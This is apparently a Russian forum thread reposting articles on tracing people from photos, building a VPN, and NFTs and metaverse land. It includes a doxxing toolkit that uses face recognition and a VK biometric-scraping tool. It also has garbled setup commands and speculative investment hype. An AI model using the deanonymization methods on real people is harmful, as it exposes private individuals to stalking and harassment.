SunCalc - уникальный сервис, который с высокой точностью может определить место, где была сделана фотография всего лишь по солнцу. Для этого нужно ввести точно время, когда была сделана фотография.
Основной проблемой метаданных является то, что они зачастую стираются любыми редакторами, не давая возможность разгласить информацию о человеке. А учитывая то, что редакторами пользуются практически все, то шанса их прочесть практически нет. Ко всему прочему EXIF очень просто стереть или изменить самостоятельно с помощью exifpurge.com, поэтому нельзя полностью полагаться на данный метод поиска.
Социальные сети Instagram, Facebook, Twitter, ВК - стирают метаданные, а вот Google+, Google Photo, Flickr, Tumblr - нет.
Поиск по фото
Как бы банально это не звучало, всегда начинайте свой поиск с обычных на первый взгляд поисковиков:
https://yandex.ru/images/
https://images.google.com/
https://go.mail.ru/search_images
https://tineye.com/
https://www.bing.com/visualsearch
Не стоит недооценивать поисковики, их кэш содержит необъятное количество изображений, в том числе и из социальных сетей. Для такого вида поиска вам ничего не потребуется, кроме самой фотографии. Ну, а если поиск не принес никаких результатов, то идем дальше.
Фотография сама по себе уже может содержать полезные в поиске вещи. Обратите внимание на примечательные объекты на заднем фоне, это может быть вывеска, кафе, улица - все, что способно дать подсказку, в какой стране, городе или улице она была сделана.
WolframAlpha может делать много вещей, связанных с технической и исторической составляющей: его применение ограничено только вашим воображением.
Распознавание лица
Существует огромное количество сервисов, по которым вы самостоятельно можете пробить человека по фото. Делимся самыми популярными и рабочими:
instadp.com - позволяет скачать полноразмерную аватарку из инстаграма.
https://vk.watch/ - поиск информации о человеке ВК, имеет большой архив исторических данных сервиса. Аналог FindFace, который более не работает.
Betaface free online demo - Face recognition, Face search, Face analysis - сравнительный анализ фото. Определит вероятность того, что на двух разных фотографиях один и тот же человек.
https://tineye.com/ - поиск первоисточника фотографии и всех доменов где она хоститься. Минусом является то, что за результат надо платить.
https://www.duplichecker.com/reverse-image-search.php - находит похожие изображения, а так же выдает список сайтов, где есть это фото.
https://github.com/solkogan/searchface - сервис скачивает фото пользователей ВК в рамках одного указанного города, и создает базу биометрических данных этих лиц, связывая их с аккаунтами ВК. Отлично работает с маленькими городами. И самое приятное, что за использование не нужно ничего платить.
pictriev - определяет возраст человека на фотографии.
https://azure.microsoft.com/ru-ru/services/cognitive-services/face/ - сервис от Microsoft Azure предназначенный для сравнения лиц. Нужно лишь перейти по ссылке и вставить два изображения, которые и будем исследовать.
https://i.gyazo.com/8415135d7b7fcd2edaf46a5569987cf2.jpg
Поиск по картам и описанию
Когда вы смогли определить примерный район или приблизительную местность, где была сделана фотография, начинайте исследовать с помощью Google Maps, а именно Street View. Вы удивитесь, но довольно часто такой поиск заканчивается успешно. Спутниковые снимки различных поисковиков - ваш хороший помощник.
https://www.freemaptools.com/ - сервис с расширенными возможностями для поиска на карте.
https://www.openstreetmap.org/ - сайт создан сообществом картографов, которые добавляют и поддерживают данные о дорогах, тропах, кафе, вокзалах и о многих других объектах по всему миру.
Если на фотографии помимо человека есть уникальные объекты, которые можно описать словами, то попытайте свою удачу, введя словесные запрос в поисковике на русском или английском языках.
Но что делать если описать фото не получается? Допустим на заднем фоне виднеются горы, а мы знаем, что объять их количество невозможно. В таком случае на помощь приходит wikimapia.org, где вы можете отфильтровать запрос по всему что угодно. Выберите "показать все горные массивы" и исследуйте карту, пока не найдете нечто похожее, что изображено на фото.
Вывод
Существует большое количество способов пробить человека по фотографии и не только. Это всего лишь верхушка айсберга. Возможности OSINT безграничны.
Если вы еще не ознакомились в предыдущими статьями на тему деанона, то советуем сделать это прямо сейчас:
https://telegra.ph/Nazovi-mne-svoe-i...heloveka-02-22
https://telegra.ph/Nazovi-mne-svoe-i...m-setyam-02-27
https://telegra.ph/Kak-probit-chelov...tografii-03-04
BlackMAST
24.03.2022, 18:25
https://i.gyazo.com/3daf515390f16712d5cf5921ef8a61c5.jpg
Инструкция по созданию собственного VPN-сервера
Вступить в наш чат
Хотите защитить и скрыть свой трафик от провайдера, хакеров и спецслужб, а также получить доступ к заблокированным сайтам в вашей стране? Способ один - VPN. Если вы цените приватность и анонимность своих действий в интернете, то использование VPN - лучшее решение. И исполнить его можно 2 путями:
Выбрать VPN-провайдера. Это самый простой и оптимальный вариант, если вы не хотите вникать в процесс создания сервера. К тому же, вы, должно быть, уже знакомы с ТОП-5 лучших провайдеров, если нет, то кликайте тут.
Создать свой VPN-сервер.
https://i.gyazo.com/bd1ca5b04e0db612b3b8cad32a8c7cd5.jpg
Если вам интересно попробовать себя в роли программиста или вы хотите освежить знания, то предлагаю сегодня разобраться, как создать свой VPN-сервер. Настройка не предполагает конкретные знания в этом деле, все что вам нужно - это желание и свободные 15 минут вашего времени.
Пробежимся по основным + и - своего VPN-сервера.
Плюсы:
неизменная скорость;
вы один на IP-адресе;
независимость от VPN-сервисов.
Минусы:
создание требует навыков;
высокая вероятность хакерской атаки на сервер.
Выбор страны для VPN-сервера
При выборе страны обычно руководствуются следующими критериями:
расстояние до вас: чем ближе страна, тем выше скорость соединения, и наоборот.
отсутствие запретов: доступность всех сервисов.
отношения стран: важно, чтобы между вашей страной и страной, где будет VPN-севрер была минимальная политическая напряженность. Но с другой стороны, эта же напряженность может сыграть вам на руку. Например, многие российские пользователи выбирают расположение своего VPN-сервера в Великобритании как раз из-за высокой напряженности между странами, если что-то произойдет, то последняя ни за что не сольет трафик российским спецслужбам.
Российским пользователям лучше всего остановить выбор на странах Евросоюза.
Выбор протокола
VPN протокол - это свод правил, которые определяют какой тип соединения будет между вашим устройством и VPN-сервером.
Существуют следующие виды протоколов:
OpenVPN
PPTP
L2TP
IKEv2
Мы же советуем выбрать OpenVPN, который используется в качестве основного практически всеми VPN-сервисами.
Как создать свой VPN-сервер
1. Выбираем хостинг для VPN-сервера
Для создания своего VPN-сервер, нам в первую очередь нужно арендовать виртуальный выделенный сервер (Virtual Private Server) у хостинг-провайдера. Самыми популярными хостинговыми сервисами являются:
► Amazon Web Services
► DigitalOcean
► Hetzner
► Vultr
► Bluehost
► Arubacloud
2. Настраиваем OpenVPN
Как только вы арендовали VPS-сервер, требуется подключиться к нему с помощью данных авторизации по SSH. Сделать это можно с помощью PuTTY.
Затем открываем консоль нашего сервера и прописываем команды в таком же порядке:
apt-get update&&apt-get upgradeapt-get install gitcd/rootgit clonecd openvpn-install****d + x openvpn-install.sh./openvpn-install.sh
Если вы вели все команды верно, то у вас должен запуститься специальный скрипт, настраивающий сервер автоматически. Во время настройки вам лишь нужно будет давать согласие, а в конце создать имя клиента.
3. Подключаемся к VPN-серверу
Итак, теперь на VPS-сервере есть файл с расширением .ovpn, который нужно переместить на то устройство, где будет подключен VPN.
4. Устанавливаем программу OpenVPN
OpenVPN требует установки своего приложения, поэтому переходим на официальный сайт и скачиваем. OpenVPN поддерживает:
https://i.gyazo.com/9ed129728a659d63a4ab8f2b76d5ded2.jpg
После установки нам нужно подключиться к нашему VPN-серверу, используя ранее созданные файлы с расширением .ovpn.
Заключение
Таким образом, мы научились настраивать VPN-сервер, который полностью защищен и недоступен ни для провайдера, ни для недоброжелателей. Теперь вы можете не беспокоиться о своей анонимности, подключаясь к Wi-Fi. Стоит отметить, что если вы много путешествуете, то вы можете создать неограниченное количество VPN-серверов и подключаться к любому из них в зависимости от вашего местоположения: это даст дополнительный уровень защиты и увеличит скорость соединения.
Дополнительные материалы к статье:
VPN от А до Я
VPN на роутере: что это такое и как настроить
Учимся взламывать Wi-Fi всего за несколько шагов
https://telegra.ph/Instrukciya-po-so...-servera-02-08
BlackMAST
24.03.2022, 18:32
https://i.gyazo.com/85afcc6ec388ba0e7ca79ff3792f8587.jpg
Бум цифрового искусства NFT
Вступить в наш чат
Несмотря на то что NFT появились на свет в 2017 году, настоящий фурор произошел только в 2021 году. Оборот NFT за текущий год составил $22 млрд, а в 2020 достиг всего $100 млн. Связано это с тем, что многие люди видят в NFT популярный тренд и идут на его поводу. В 2021 году каждая вторая знаменитость, компания выпустили свои уникальные токены на продажу. Так, человек, ранее далекий от мира криптовалют, изъявил желание приобрести или создать свой собственный NFT. В предыдущей статье мы с вами разобрали, что лежит в основе NFT, как его создать и т.д.
Сегодня же мы с вами поговорим о самых дорогих токенах, которые принесли миллионы долларов своим владельцам и разберемся в феномене популярности и ценности.
Что же продают в виде NFT?
Мы можем разделить NFT-токены на 4 большие группы:
Игры. Это могут быть уникальные персонажи, виртуальные участки земли, необычные карточки. Данная категория отличается от других тем, что вы можете найти применение купленным вещам в игре.
Искусство. Аналог традиционным произведениям: пиксельные картинки Nyan Cat, Бэнкси, скучающие обезьяны и многое другое.
Предметы коллекционирования. Аватарки, карточки, фигурки и другие штуки для пополнения виртуальной коллекции. Ажиотаж вокруг них происходит по той причине, что выпускаются они в ограниченном тираже.
Социальные токены. Они включают в себя личные токены и токены сообщества. Последние используются для членств или сообществ. Таким образом, если вы покупаете такой токен, то вам открывается доступ к приватным чатам в Telegram, серверам Discord и т. д. Создатели также зачастую поощряют держателей токенов, устраивая различные конкурсы.
Вашему вниманию представлен ТОП-10 самых дорогих и необычных NFT-токенов. Приготовьтесь удивляться!
①Одной из первых громких сделок стала продажа гифки летящего кота с туловищем из печенья Nyan Cat.
https://i.gyazo.com/35a06b9d9f082c7f2b9b2313fc1306fc.jpg
Создателю сего шедевра Крису Торресу посчастливилось заработать 300 ETH, на сегодняшний день это более 90 млн рублей. Торрес немного видоизменил оригинал и улучшил разрешение.
https://i.gyazo.com/d9a8d2b80b921976a808b7b578d151cd.jpg
Бипл продал самый дорогой NFT за всю историю, который он собрал в виде коллажа "Каждый день: первые 5000 дней". Художник рисовал каждый день по картине, после чего объединил их в 1 NFT, который продал на аукционе за $69.3 миллионов.
https://i.gyazo.com/86122b15d94b1b58a407381da9a8739e.jpg
③
CryptoPunks - еще одна из нашумевших коллекций. Она состоит из десяти тысяч аватаров, на которых изображены панки с разными отличительными чертами.
https://i.gyazo.com/a80a29d9af328e929f9fcb0614251673.jpg
Самым дорогим NFT из коллекции на данный момент считается панк под номером 7523, именуемый "Чужой", его продажа принесла $11,8 млн.
https://i.gyazo.com/b32aa175f14a06ebe6e0d5d45d55f83e.png
Панки под номерами 7804 ($7.6 млн) и 3100 ($7.67 млн) тоже не обошлись без особого внимания.
④Серия NFT Bored Ape Yacht Club состоит из 10000 обезьян с непохожими образами: очки, повязки, головные уборы, аксессуары, даже пирсинг. Приобрести токен из коллекции значит стать членом почетного клуба. На сегодняшний день покупатели уже оценили некоторые привилегии, такие как бесплатные бонусные NFT и доступ к эксклюзивным товарам.
https://i.gyazo.com/53f47fa1f669f2ca713126c696475c88.jpg
Минимальная цена за токен с обезьяной начинается от 59,0 ETH, а максимальная достигает 769,0 ETH. В сентябре набор из 101 NFT из данной коллекции ушел на аукционе за $24,4 миллиона.
В недавнем времени произошел конфуз из-за того, что владелец допустил ошибку при выставлении цены, и вместо $300 000 продал NFT под номером 3547 за $3000. Опечатка была замечена, когда токен уже был куплен. Новый держатель уже выставил обезьяну на продажу, но уже за $321 000.
https://i.gyazo.com/de10cb693b2aff8cfbc66ed815333358.jpg
⑤Если панки и обезьяны вас не удивили, то посмотрите на следующие NFT-токены, которые также ушли за крупную сумму.
EtherRock - серия, состоящая из сотни одинаковых камней, которая была выпущена в 2017 году.
Так, камень под номером 21 недавно был продан за 45 ETH ($176 614 по нынешнему курсу).
https://i.gyazo.com/6edbfbed8cafdde0e0a2b3ee4dfc1dbf.jpg
Это не единственный проданный камень, общий объем торгов превысил $15,5 млн.
В интернете вы даже можете найти пошаговые "обучалки", как лучше и выгоднее купить NFT EtherRock.
⑥Сжечь картину, чтобы превратить ее в NFT. Такая участь постигла картину Бэнкси "Morons". Сожжение картины транслировалось online в YouTube и Twitter. После уничтожения был создан NFT-токен, ставший первым токеном, перенесенным из материального обличия в виртуальное. Этот ритуал был необходим для того, чтобы уничтожить оригинал и таким способом передать статус подлинника NFT. Он был продан за 228,69 ETH ($917 668 по курсу на момент написания).
https://i.gyazo.com/8349a1f1f0c2bbcf45fd81cb73e98ec0.jpg
⑦Crossroad - еще одно творение художника Бипл, представляющее из себя 10 секундное gif-изображение с оголенным Дональдом Трампом в парке. Резонанс этой картинки в том, что она могла бы измениться в зависимости от результатов выбором, то есть мы имели бы либо нынешнее изображение, либо с Трампом победителем.
https://i.gyazo.com/1bca10d79b35278df5efcacda91f5dec.jpg
Продажа принесла $6.6 миллионов и сделала Crossroad одним из самых дорогостоящих токенов.
⑧Певица Граймс выставила на аукцион серию работ, которые создала в сотрудничестве со своим братом Маком Бушером. Граймс заработала $5,8 миллиона менее чем за 30 минут, продав 10 NFT под названием "WarNymph". Некоторые работы были в единственном экземпляре, а другие - тиражом в сотни копий. А пиар-менеджером выступил ее муж Илон Маск, который опубликовал пост в твиттере.
https://i.gyazo.com/02fba0f85ad60f06ddb0e7aa891926a9.jpg
Новые держатели NFT снова продают многие работы, но теперь уже за $2,5 млн.
⑨Дом, в котором нельзя жить Mars House.Это первый виртуальный дом, который был выпущен в виде NFT. Создательница дома на Марсе Криста Ким продала NFT-токен за $500 000. "Войти" в дом можно с помощью шлема виртуальной реальности, загрузив файл в 3D-модели.
https://i.gyazo.com/05d4a5359a189bddb82da921d07d776a.jpg
Это не единственный дом в виртуальной реальности, появляется все больше и больше желающих инвестировать в виртуальную недвижимость.
⑩Участок в игре Axie Infinity «Genesis» Estate за $1,5 млн. Да, вы не ослышались. Покупатель приобрел 9 участков, которые обошлись ему в кругленькую сумму. Помимо земель в этой игре к покупке еще доступны различные уникальные персонажи Axies, которых вы можете покупать, выращивать, разводить и продавать в виде NFT.
https://i.gyazo.com/ab71eb92411210ac2a73c282d8390e1f.jpg
Ценность NFT
Возникает вопрос: "Для чего нужно покупать картину хоть и известного художника, если ее можно скачать бесплатно?"
Ответ прост - скачанная картинка не может принести прибыль, а NFT может. Так, ценность работы Бипла "Crossroad" выросла с $582 000 до $6.6 млн. NFT, как и любой другой актив имеет свойство дорожать, поэтому многие покупатели инвестируют в NFT с целью дальнейшей продажи, но уже по более высокой цене.
Нет четких правил за сколько следует покупать и продавать NFT, но есть несколько ключевых моментов, на которые стоит обращать внимание:
Известность - основной принцип при покупке NFT. Очевидно, что NFT, выпущенное популярным художником более ценно, чем NFT от no-name создателя.
Редкость. NFT в единственном экземпляре представляет большую ценность, чем в N-тираже.
Объем транзакций. Обращайте внимание на транзакционную активность, NFT с высокой активностью способствуют получению наибольшей прибыли.
Вывод
Логика покупателей, которые приобретают токены по бешеной цене проста: если что-то выпускается в лимитированном количестве, то в последствие оно будет только дорожать - к примеру, как и в ситуации с BTC. Но в данный момент мы наблюдаем спад биткоина, и никто точно не знает, что же с ним будет дальше. NFT, как и любая другая криптовалюта, не дает никаких гарантий вашей прибыли. Существует огромный риск понести убытки в случае, если ажиотаж вокруг NFT угаснет. Но пока цифры демонстрируют нам обратное: популярность и продажи растут, а знаменитости то и дело выпускают очередной NFT-токен.
https://telegra.ph/Bum-cifrovogo-iskusstva-NFT-03-09
BlackMAST
24.03.2022, 18:39
https://i.gyazo.com/de08cc2733007d92bc04eb32aa016c07.jpg
Будущее за NFT и метавселенными?
Вступить в наш чат
Будь то MMORPG, конференция в Zoom или онлайн концерт любимого исполнителя, людям давно не нов виртуальный мир. Но с недавнего времени стала набирать обороты новая технология, именуемая как "метавселенная", хотя она схожа с концепцией многопользовательских игр - это намного больше, чем просто ролевая игра - это целый виртуальный мир.
Термин метавселенной возможно покажется для вас новым и незнакомым, но это не так, вы точно должны знать о чем идет речь. Теперь у вас возникает вопрос о том, что же все-таки представляет из себя метавселенная. Для того, чтобы ответить на него достаточно обратиться к истокам происхождения этого термина. Изначально понятие метавселенной появилось в книгах писателей-фантастов: в романе "Лавина" Н. Стивенсона оно обозначает виртуальный мир, который поражает своей схожестью с физической реальностью. Вслед за книгами стали появляться и другие известные для нас произведения "Матрица", "Аватар", "Первому игроку приготовиться".
https://i.gyazo.com/e4cca2f1794d73e1be94a882841d9a11.jpg
Но причем тут наш мир? Неужели фантастика становится реальностью? Давайте обо всем поподробнее.
Связь метавселенной и NFT
Эти два понятия зачастую неправильно понимаются и путаются в сознаниях людей, поэтому очень важно их различать. Для этого давайте дадим им определения.
Что такое NFT
NFT - это невзаимозаменяемые токены или, проще говоря, криптовалюта, которая хранятся в блокчейне.
NFT бывают в виде изображений, видео, аудио, коллекционных предметов в играх или любых других виртуальных объектах. Запись о владении NFT сохраняется в блокчейне, и её можно обменять на цифровые активы. Хотя NFT могут с легкостью быть скопированы и сохранены, это не будет являться "оригиналом", право собственности остается за владельцем, купившим NFT. Эта особенность и отличает невзаимозаменяемые токены от любой другой криптовалюты, поэтому NFT лежат в основе роста метавселенной.
Больше познавательной информации про NFT читайте в это статье.
Что такое метавселенная
Термин «метавселенная» можно разделить на две части - "мета" и "вселенная", где "мета" значит "за пределами". Иначе говоря, метавселенная - это новая дополнительная реальность за пределами вселенной или же параллельная виртуальная вселенная, существующая одновременно с реальным миром.
Метавселенная - это следующий уровень в развитии компьютерных технологий. На данный момент нет четкого представления, как она будет выглядеть в конечном итоге. Но уже сейчас присутствуют очки и гарнитуры виртуальной реальности, которые помогают полностью погрузиться в образ виртуального аватара.
Связь
Ключ к метавселенной можно найти в цифровой валюте, а именно в невзаимозаменяемых токенах. NFT дают права собственности на цифровые активы, например, вы можете использовать их для покупки и продажи виртуальной недвижимости, произведений искусства, билетов на концерты, путешествия. Так, NFT используются в метавселенных для преобретения собственности, которая дает право верифицированного цифрового владения. Главным катализатором метаэкономики является то, что любые цифровые товары можно купить и продать по усмотрению пользователей.
Метавселенные и компании
Компании гиганты уже давно проявили свой интерес к метавселенным. Только Цукерерг на проект метавселенной анонсировал $10 млрд и задействовал 10.000 сотрудников Facebook. И это далеко не единственная корпорация, заинтересованная в освоении метавселенной. Epic Games, Amazon, Microsoft, Unity и другие компании тоже делают свой вклад в развитие новой технологии. Даже YouTube задался целью создать собственную метавселенную и дать возможность видеоблогерам зарабатывать на ней с помощью NFT.
Предполагается, что вскоре мы будем учиться, работать, общаться и посещать различные мероприятия в метавселенной.
На данный момент самыми известными примерами метавселенной, хотя и в ограниченных формах, являются платформы виртуальной реальности Decentraland и Sandbox.
Зачем компании вкладывают $ млрд в метавселенную?
Бум вокруг метавселенной начался в 2021 году, тогда цены на виртуальную недвижимость выросли на 3000 %. Конечно же, большую роль сыграла изоляция, которая внесла свои коррективы в привычный уклад вещей. Огромное количество компаний перешли на удаленку - офисы опустели, а недвижимость упала в цене. Именно по этой причине все внимание компаний переместилось на виртуальную реальность. Цены на цифровую землю растут с каждым днем, а мировые гиганты открывают в метавселенных свои офисы.
Отличие метавселенной от игры:
Бесконечное существование. Метавселенная существует как полноценная реальность, поэтому она никогда не останавливается и не заканчивается.
Нет ограничений. Каждый человек может оказывать влияние на метавселенную, менять, создавать что-либо. Также нет никаких лимитов на количество пользователей.
Своя экономика или метаэкономика. Вы можете покупать, продавать, создавать и обменивать любые товары.
Объединяет виртуальный и физический миры.
Совместимость данных. Пользователи могут перемещать данные в виртуальных мирах. Например, перенести авто из GTA в Need for Speed.
Перспективы
Вот несколько основных идей метавселенных, которые выделил Марк Цукерберг:
Виртуальное пространство. Главной особенность метавселенной будет возможность переместиться в виртуальное трехмерное пространство. У вас будет создаваться ощущение, что все что происходит вокруг реально.
Общение. В будущем никто не будет разговаривать по телефону, вместо этого вы будете общаться с рядом сидящей голограммой.
Рабочий стол. Нужно создать рабочую обстановку, находясь при этом в кафе - легко. Вы увидите перед собой монитор с папками и ярлыками, так, как если бы вы работали дома или в офисе мечты.
Собрания. Вместо Zoom уже сейчас в США, по словам Марка, многие проводят собрания в VR. А в дальнейшем, если получится, - будут в метавселенной.
Бракосочетания. Первая церемония заключения брака уже состоялось в метавселенной Decentraland. Свидетельство о браке было выдано в виде NFT. Также процесс токенизации прошли и обручальные кольца пары.
Вывод
Последние пару лет сыграли огромную роль в зарождении метавселенной. Из фантастических романов и фильмов метавселенная переместилась в реальность, хоть и в самое начало ее развития. Трудно предугадать, сможем ли мы увидеть ее в том виде, в котором она существует в "Матрице" или "Первому игроку приготовиться", но мы точно можем сказать, что технологии развиваются, а интерес безусловно растет.
Велика вероятность, что метавселенная приобретет форму, о которой мы еще даже не догадываемся.
Если вы возлагаете большие надежды на метавселенную, то самое время вкладываться в цифровую недвижимость. О том, как приобрести NFT-землю вы узнаете в следующей части.
https://telegra.ph/Budushchee-za-NFT...elennymi-03-03
BlackMAST
24.03.2022, 18:41
https://i.gyazo.com/2307ec73575b97f951c2e741bf820efd.jpg
Как купить NFT-землю
Вступить в наш чат
Современный мир диктует новые правила - виртуальная реальность заменяет физический мир, компании вкладывают миллиарды долларов в развитие метавселенной, а простые пользователи покупают виртуальные участки земли в виде NFT-токенов. Очевидно, что спрос на цифровую землю растет с каждым днем подобно рынку реальной недвижимости. Если вы все-таки решили всерьез задуматься над покупкой, то просто следуйте руководству.
https://i.gyazo.com/b55bd624beb265de174e99a3d9f54a7b.png
Что такое NFT-земля
NFT-земля - виртуальный участок в метавселенной с уникальным правом собственности, поскольку земля прикрепляется к конкретному NFT. Приобретая такую землю, вы можете открыть для себя доступ в развивающейся метавселенной и исследовать участок с помощью аватара или же перепродать его дороже, сдать в аренду. Не менее популярным вариантом использования NFT-земли является проведение ивентов, конференций. Также многие пользователи покупают земли для того, чтобы получить бонусы внутри игры.
Как купить NFT-землю в метавселенной
Покупка NFT-земли ничем не отличается от приобретения любого другого невзаимозаменяемого токена.
Сделать это можно 2 способами:
на распродаже проекта;
на NFT-маркетплейсах.
Что нужно:
цифровой кошелек;
криптовалюта.
Выбираем платформу
Первым действием нужно определиться с метавселенной, поскольку их отличают различные возможности. Выделяют на данный момент следующие платформы виртуальной реальности: Decentraland и Sandbox.
Мы для примера возьмем метавселенную The Sandbox на Ethereum.
Подключаем кошелек к The Sandbox Marketplace
Самыми подходящими вариантами являются кошельки Binance Chain Wallet и MetaMask. После того, как настроили один из них, то заходим на The Sandbox и смотрим на карте доступные участки земли. Некоторые из них можно купить непосредственно через The Sandbox Marketplace, а другие на сторонних биржах, таких как OpenSea. В нашем примере мы будем делать через The SandBox.
На главной странице SandBox в верхнем правом углу выберите "Sign In". Убедитесь, что кошелек настроен на блокчейн проекта, в данном случае Ethereum.Затем нажимаем на "Metamask".
https://i.gyazo.com/790e163b74ab029976643a5d06f3e4f0.jpg
После чего появится всплывающее окно, где нужно подтвердить подключение, нажав "Next".
https://i.gyazo.com/0c4b7b38e2c21fdc58cc0f04ecb81d2e.png
Cледующим шагом подключаемся к аккаунту, выбрав "Connect".
https://i.gyazo.com/01a698667641482b9ce742420d08f473.png
Учетная запись практически готова! Осталось указать email, никнейм, пароль и нажать "Continue". И завершаем создание аккаунта с помощью кнопки "Sign".
Готово. Теперь на сайте у вас появился баланс и аватарка.
https://i.gyazo.com/7bbcc991f52ff5271e024eb0d177f313.png
Покупаем ETH на Binance
Для того, чтобы купить участок нам понадобится криптовалюта - эфир, так как The Sandbox чаще всего принимает только его. Эфир вы можете приобрести на Binance с помощью кредитки.
https://i.gyazo.com/bd65e12ffed6e86afc2ae4f568133c8a.png
Далее нужно перевести активы на криптокошелек. Скопируйте публичный адрес криптокошелька и введите его в качестве адреса для вывода средств.
Выбираем участок
Отсортируйте участки с помощью фильтров. Поскольку значительная часть земель The Sandbox уже куплена, их можно купить только на OpenSea. Однако некоторые участки пока еще можно приобрести через карту The Sandbox. Кроме того, эта карта - отличный способ, чтобы удостовериться, что вы приобретаете надежную NFT-землю, так как ссылки OpenSea включены в интерфейс.
https://i.gyazo.com/7ce2c2c8cba593bdde6a3e9aaf493135.png
Как только определитесь с землей, выберите "Bid", чтобы поторговаться или купите по указанной цене.
https://i.gyazo.com/83e3eac76b8353ea5995bd22e7c98210.png
Продаем NFT-землю
Продать участок можно 2 способами:
на маркетплейсе метавселенной;
на сторонних торговых площадках.
В данный момент платформой Sandbox не предусмотрена прямая продажа. Для этого вам придется воспользоваться услугами вторичного рынка. Например, на OpenSea достаточно зайти в свой профиль, выбрать нужный NFT и нажать "Sell".
Что касается аренды участка, то в данный момент на Sandbox нельзя этого сделать официально и безопасно. Некоторые пользователи сами договариваются с арендаторами без поддержки сайта, но зачастую это заканчивается печально.
Вывод
Любая покупка подразумевает возможные риски, поэтому взвесьте все за и против перед тем как купить NFT-землю. Обязательно изучите метавселенную, в которую вы инвестируете и доверяйте только проверенным маркетплейсам.
Дополнительные материалы к статье:
NFT - феномен в мире криптовалют
Бум цифрового искусства NFT
Как NFT изменили жизнь Павла Сказкина: путь от наркокурьера до успешного художника
Будущее за NFT и метавселенными?
https://telegra.ph/Kak-kupit-NFT-zemlyu-03-03
BlackMAST
24.03.2022, 18:43
https://i.imgur.com/vNh2u3o.jpg
Как NFT изменили жизнь Павла Сказкина: путь от наркокурьера до успешного художника
Вступить в наш чат
Знакомьтесь, Павел Сказкин, он же заключенный художник, успешно продающий свои NFT. Сегодня мы расскажем о его пути от даркнета до художника невзаимозаменяемых токенов.
От даркнета до тюрьмы
Как же Павел Сказкин докатился до такой жизни - в середине 2010-х площадки по продаже наркотиков в даркнете были наиболее востребованы:
"Внезапно появилась крипта, нижний интернет, теневые рынки, даркнет, - вспоминает Павел. - Я стал отовариваться там. В какой-то момент я набрел на объявление, что требуются сотрудники. Закончилось это тем, что я нахожусь тут". Работать он стал администратором в RAMP, продавая запрещенные препараты. О том как все происходило, он рассказывает:
"Товары и услуги прямиком из дьявольского сундука: все, что нельзя купить в обычном магазине, можно достать в даркнете (или можно было, на сегодняшние реалии не могу сказать). Сделки на площадках происходят по схеме: покупатель-гарант(площадка)-продавец. Отправленные покупателем средства поступают не напрямую к продавцу, а к гаранту, который получает комиссию за свои услуги. После подтверждения состоявшейся сделки обеими сторонами, средства отправляются гарантом продавцу".После должности администратора Павел решил попробовать себя в роли наркокурьера, и как результат оказался на зоне. Срок он получил - 6 лет лишения свободы с отбыванием наказания в колонии строгого режима за попытку распространения веществ запрещенных законодательством РФ в особо крупном размере, а именно марихуаны.
В тюремной библиотеке Сказкин изучил Уголовный Кодекс и сам подал прошение о смягчении наказания:
"Затянулось это на 11 месяцев и 5 судебных заседаний. В первых трех инстанциях суды отказывали мне и только после того, когда я дошел до Верховного суда РФ удалось получить положительное решение. Летом 2021 года я первый раз за 4 года и 6 месяцев вышел на свободу, увидел жену, маму и отправился в исправительный центр. Здесь у меня был доступ к гаджетам, и это существенно изменило мою жизнь".
Рисование = спасение
Рисование всегда было главным хобби для Павла. Рисовать он начал еще в детстве, но никогда не мог подумать, что в будущем его талант сыграет ему на руку. Так вышло, что его увлечение стало единственной отдушиной и спасением в тюрьме. Другие заключенные сразу же признали талант художника:
"Навыки рисования пригодились мне в местах лишения свободы, я рисовал на простынях, на досках для нард, делал открытки для других осужденных, рисовал стенгазеты по поручениям сотрудников исправительного учреждения. Ну и для себя я рисунки делал, просто потому что мне нравится. Отправлял детям, потому что подарков я никаких сделать не мог».Очень тяжело Сказкину давался информационный голод, поэтому для того, чтобы быть в курсе всех новостей, он выписывал доступные заключенным журналы. Именно из журналов и газет он узнал о NFT-токенах, так и зародилась идея попробовать себя в новом направлении, ведь многие эксперты заявляли, что будущее цифровых технологий за виртуальными мирами.
NFT
Встреча с Ильей Орловым в одном из телеграмм-каналов о NFT оказалась судьбоносной:
"Найдя русскоязычный чат об NFT, я стал расспрашивать пользователей о токенах, и в одной из бесед отправил в чат фото с колючей проволокой, на что получил массу вопросов. Именно тогда меня и заметил Илья. Попросил рассказать свою историю и показать рисунки. На тот момент я продал несколько своих NFT за 2-5$. Средств для размещения на дорогих и полузакрытых площадках у меня не было. Илья, поверивший в меня и в уникальность моей истории, проявил сумасшедший интерес к тому, что я делаю и взял на себя все финансовые затраты и продвижение моих работ".Он решил, что многих людей покорит история Павла, поэтому основным лейкмотивом его творчества и NFT в том числе выбрал тему заключения. Он решил, что акцент в позиционировании художника с никнеймом papasweeds нужно делать на истории его заключения: «Я жил на Западе, и я понимаю, что они там очень любят Достоевского за всю эту глубину, за боль. Они и Pussy Riot полюбили за то, как их ранила власть. И это для них как театр и шоу, которое продается. Я подумал, ну почему нет? Мы поможем Паше. Мы раскачаем проект».
Так художник под никнеймом papasweed и Илья Орлов всего за пару месяцев продали NFT на сумму более чем на 1 миллион рублей, 30 процентов от которых пошли на благотворительность "Руси сидящей".
NFT-токены Павла Сказкина
Первым NFT стала работа под названием "Hall of Shame" или "Зал стыда", на переднем плане которой мы видим полуобнаженного судью с молотком и пакетом с конфетами, а на заднем плане сидит плачущий ребенок. Продана эта работа была за 1 эфир или 2 881,04USD по нынешнему курсу.
Сам Павел Сказкин метафорично описал данную работу:
"Каждый приговор, произнесенный в зале суда, похож на смертный приговор. Годы вашей жизни мгновенно отнимаются. Я чувствовал себя беспомощным, уязвимым ребенком. Стыд, который я чувствовал перед женой и детьми, убивал меня. Я все смотрел на ее слезы и с трудом удерживался от слез, но на самом деле это могли быть слезы радости. Я повторяю себе: "Слава богу, прошло не десять лет", как будто это была проклятая мантра. Российская тюрьма - ужасное исправительное учреждение, призванное стыдить и ломать людей. Я пять лет изучал их учебную программу и скоро закончу".Вторая работа с названием "Испорченное" не менее поражает своей картинкой и душераздирающем описанием.
https://i.gyazo.com/f0fffbbf66c519421a9fba4000dcbcc7.jpg
"Всю свою жизнь я слышал от окружающих, что я делаю что-то не так. Это плохо, это невозможно, это недопустимо, этого не поймут. Я никогда не представлял это, но все повернулось так, что быть тем, кто ты есть на самом деле - это недопустимая роскошь, и большинству людей запрещено делать то, что они хотят, и быть тем, кем они хотят. Пытаясь пойти против системы, никогда не знаешь, где окажешься. Ты должен быть осторожен со своими желаниями, и в то же время не отказываться от мечты и надежды, хранить их в надежном месте, в своем сердце и душе".Третья же работа "Адский вызов" пронизана верой на светлое будущее.
